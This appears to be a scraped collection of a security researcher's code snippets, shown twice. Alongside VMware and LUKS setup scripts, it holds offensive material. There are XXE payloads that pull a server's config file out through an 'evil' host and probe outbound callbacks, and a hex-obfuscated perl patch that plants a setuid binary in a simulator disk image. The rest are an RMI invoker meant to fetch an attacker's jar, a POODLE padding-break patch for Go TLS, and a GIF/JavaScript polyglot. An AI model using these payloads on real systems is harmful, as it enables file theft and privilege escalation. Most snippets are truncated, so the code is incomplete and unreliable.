Etienne Stalmans staaldraad

## setWireshark
#!/bin/bash

if [ "$1" != "" ]; then
    USERNAME=$1
else
   echo "ERROR: no username supplied"
   echo "Using current user"
   USERNAME=`whoami`

fi

## vmware_installfix
# Ensure all kernel headers are installed
yum install kernel-devel kernel-headers
# Make a copy of version.h to a location known to Vmware
cp /usr/src/kernels/`uname -r`/include/generated/uapi/linux/version.h /lib/modules/`uname -r`/build/include/linux/

#fix vmnet build

cd /usr/lib/vmware/modules/source/
curl http://pastie.org/pastes/8672356/download -o vmware-netfilter.patch
tar xf vmnet.tar

## gist:2f0d2ba4aa6afb0dd36f
vmware-installer -u vmware-player

http://dandar3.blogspot.cz/2014/01/vmware-player-601-on-ubuntu-1404-alpha.html

## crypt_setup.sh
#create new file to use as container
#dd if=/dev/zero of=/out count=5000k
fallocate -l 1G test.img

#create luks wrapper
cryptsetup -v -y luksFormat /out
cryptsetup luksOpen /out cryptname
cryptsetup -v status cryptname

#make into filesystem

## PatchBB10Simulator.sh
perl  -i.backup -0777 -pe  's/\x69\x66\x20\x5b\x20\x22\x24\x7b\x42\x4f\x41\x52\x44\x5f\x43\x4f\x4e\x46\x49\x47\x7d\x22\x20\x21\x3d\x20\x22\x64\x65\x76\x65\x6c\x6f\x70\x65\x72\x22\x20\x5d\x3b\x20\x74\x68\x65\x6e\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x6d\x20\x2d\x72\x66\x20\x2f\x72\x6f\x6f\x74\x2f\x2e\x20\x3e\x20\x2f\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x20\x32\x3e\x26\x31\x3b\x0a\x20\x20\x20\x20\x66\x69\x3b/\x63\x70\x20\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x73\x65\x74\x75\x69\x64\x67\x69\x64\x20\x2f\x74\x6d\x70\x20\x26\x26\x20\x63\x68\x6d\x6f\x64\x20\x36\x37\x35\x35\x20\x2f\x74\x6d\x70\x2f\x73\x65\x74\x75\x69\x64\x67\x69\x64\x3b\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20/g'  BlackBerry10Simulator-s001.vmdk

## xxe
Payload:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
 <!ENTITY % start "<![CDATA[">
 <!ENTITY % stuff SYSTEM "file:///usr/local/tomcat/webapps/customapp/WEB-INF/applicationContext.xml ">
<!ENTITY % end "]]>">
<!ENTITY % dtd SYSTEM "http://evil/evil.xml">
%dtd;
]>

## pyrmi.py
#!/usr/bin/python

"""
Python implementation of RMI invoker. Should try fetch a .jar from a server we control.
Author: Etienne Stalmans <etienne@sensepost.com>
Version: 08/10/2014 - v0.1
"""

import socket
import binascii

## XXE_payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------

<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>

## poodle-tls-go.patch
diff -u -r b/src/pkg/crypto/tls/common.go a/src/pkg/crypto/tls/common.go
--- b/src/pkg/crypto/tls/common.go	2014-10-01 02:51:45.000000000 +0100
+++ a/src/pkg/crypto/tls/common.go	2014-12-09 13:55:55.167748499 +0000
@@ -301,6 +301,8 @@
 	// be used.
 	CurvePreferences []CurveID

+	BreakCBCPadding bool
+
 	serverInitOnce sync.Once // guards calling (*Config).serverInit

## gifjs
0000000: 4749 4638 3961 2f2a 0a00 00ff 002c 0000  GIF89a/*.....,..
0000010: 0000 2f2a 0a00 0002 003b 2a2f 3d31 3b61  ../*.....;*/=1;a
0000020: 6c65 7274 2822 4865 6c6c 6f22 293b       lert("Hello");
	#!/bin/bash

	if [ "$1" != "" ]; then
	USERNAME=$1
	else
	echo "ERROR: no username supplied"
	echo "Using current user"
	USERNAME=`whoami`

	fi
	# Ensure all kernel headers are installed
	yum install kernel-devel kernel-headers
	# Make a copy of version.h to a location known to Vmware
	cp /usr/src/kernels/`uname -r`/include/generated/uapi/linux/version.h /lib/modules/`uname -r`/build/include/linux/

	#fix vmnet build

	cd /usr/lib/vmware/modules/source/
	curl http://pastie.org/pastes/8672356/download -o vmware-netfilter.patch
	tar xf vmnet.tar
	vmware-installer -u vmware-player

	http://dandar3.blogspot.cz/2014/01/vmware-player-601-on-ubuntu-1404-alpha.html
	#create new file to use as container
	#dd if=/dev/zero of=/out count=5000k
	fallocate -l 1G test.img

	#create luks wrapper
	cryptsetup -v -y luksFormat /out
	cryptsetup luksOpen /out cryptname
	cryptsetup -v status cryptname

	#make into filesystem
	Payload:

	<?xml version="1.0" encoding="utf-8"?>
	<!DOCTYPE root [
	<!ENTITY % start "<![CDATA[">
	<!ENTITY % stuff SYSTEM "file:///usr/local/tomcat/webapps/customapp/WEB-INF/applicationContext.xml ">
	<!ENTITY % end "]]>">
	<!ENTITY % dtd SYSTEM "http://evil/evil.xml">
	%dtd;
	]>
	#!/usr/bin/python

	"""
	Python implementation of RMI invoker. Should try fetch a .jar from a server we control.
	Author: Etienne Stalmans <etienne@sensepost.com>
	Version: 08/10/2014 - v0.1
	"""

	import socket
	import binascii
	--------------------------------------------------------------
	Vanilla, used to verify outbound xxe or blind xxe
	--------------------------------------------------------------

	<?xml version="1.0" ?>
	<!DOCTYPE r [
	<!ELEMENT r ANY >
	<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
	]>
	<r>&sp;</r>
	diff -u -r b/src/pkg/crypto/tls/common.go a/src/pkg/crypto/tls/common.go
	--- b/src/pkg/crypto/tls/common.go 2014-10-01 02:51:45.000000000 +0100
	+++ a/src/pkg/crypto/tls/common.go 2014-12-09 13:55:55.167748499 +0000
	@@ -301,6 +301,8 @@
	// be used.
	CurvePreferences []CurveID

	+ BreakCBCPadding bool
	+
	serverInitOnce sync.Once // guards calling (*Config).serverInit
	0000000: 4749 4638 3961 2f2a 0a00 00ff 002c 0000 GIF89a/*.....,..
	0000010: 0000 2f2a 0a00 0002 003b 2a2f 3d31 3b61 ../.....;/=1;a
	0000020: 6c65 7274 2822 4865 6c6c 6f22 293b lert("Hello");